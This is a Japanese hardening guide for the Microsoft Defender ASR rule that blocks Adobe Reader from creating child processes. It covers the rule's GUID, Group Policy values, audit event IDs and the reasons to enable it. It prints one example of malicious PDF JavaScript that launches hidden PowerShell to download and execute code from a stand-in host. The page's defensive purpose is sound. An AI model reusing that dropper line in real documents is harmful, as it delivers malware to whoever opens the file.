MENU

ASR Rule Adobe Reader による子プロセスの作成をブロックする

概要

  • 初期侵入対策
  • GUID:7674BA52-37EB-4A4F-AF36-7750D8F5C6FB
  • 推奨設定値:1: ブロック (攻撃面の縮小ルールを有効にする)

攻撃者は、電子メールの PDF 添付ファイルに Java Script を埋め込み、自身の子プロセスとして PowerShell を起動し、悪性 Web サイトからマルウェア本体をダウンロードします。

# PDF に埋め込む悪性スクリプトの例
var cmd = "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://malware.example/…')";
app.launchURL(cmd, true);

このルールは、Adobe Reader の子プロセス実行(PowerShell やコマンドラインインターフェースの起動)をブロックし、ダウンロードを未然に防止します。以下を検出したら “すべてブロック” されます。

  • Adobe Reader が EXE を起動(PowerShell・cmd 等)
  • Reader が rundll32.exe を起動
  • Reader が wscript / mshta を起動
  • Reader が外部コマンド実行
  • Reader が BITS / COM を使ってダウンローダー呼び出し
  • Reader が不審な DLL をロードしてプロセス生成
  • PDF 内 JS が外部プログラムを実行しようとする

設定

  • グループポリシー
    • [ コンピューターの構成 ]>[ ポリシー ]>[ 管理用テンプレート ]>[ Windows コンポーネント ]>[ Microsoft Defender ウイルス対策 ]>[ Microsoft Defender Exploit Guard ]>[ Attack Surface Reduction ]>[ Attack Surface Reduction 規則の構成 ]:[ 有効 ]
      • [ 各 ASR 規則の状態を設定します。]:[ 表示 ] をクリックする。
        • [ 値の名前 ]:7674BA52-37EB-4A4F-AF36-7750D8F5C6FB
        • [ 値 ]:
          • 0: 無効にする (攻撃面の縮小ルールを無効にする)
          • 1: ブロック (攻撃面の縮小ルールを有効にする)
          • 2: 監査 (攻撃面の縮小ルールが有効な場合にorganizationに与える影響を評価する)
          • 6: 警告 (攻撃面の縮小ルールを有効にするが、エンド ユーザーがブロックをバイパスできるようにする)

監査ログ

Defender Operational ログ:

  • ID 1121(ASR: child process blocked)
  • ID 1116(悪性動作)

ログには、以下が表示されます。

  • 親:AcroRd32.exe
  • 子:powershell.exe など
  • コマンドライン
  • ブロック理由(ASR)

推奨設定と運用上の注意点

有効にすることを推奨します。
PDF 文書を開くことで、PowerShell や cmd を起動するという事象は、一般的な運用では不自然です。本機能を有効にした場合の不利益よりも、意図しないコマンドの実行を阻止するべきです。

よかったらシェアしてね!
  • URLをコピーしました!
  • URLをコピーしました!

この記事を書いた人

目次